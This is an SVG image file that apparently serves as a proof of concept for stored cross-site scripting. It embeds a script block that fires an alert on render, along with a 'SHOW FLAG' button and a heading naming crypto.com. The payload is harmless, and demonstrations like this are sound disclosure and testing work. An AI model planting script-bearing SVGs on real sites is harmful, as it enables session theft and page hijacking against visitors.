<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg"> | |
<a href="#" id="showFlagLink"> | |
<rect x="50" y="50" width="200" height="60" rx="10" ry="10" fill="#007BFF" /> | |
<text x="150" y="90" font-family="Arial" font-size="20" fill="white" text-anchor="middle">SHOW FLAG</text> | |
</a> | |
<script type="text/javascript"> | |
alert("This is an example of a stored XSS attack in an SVG image") | |
</script> | |
<h1>HELLO CRYPTO.COM</h1> | |
</svg> | |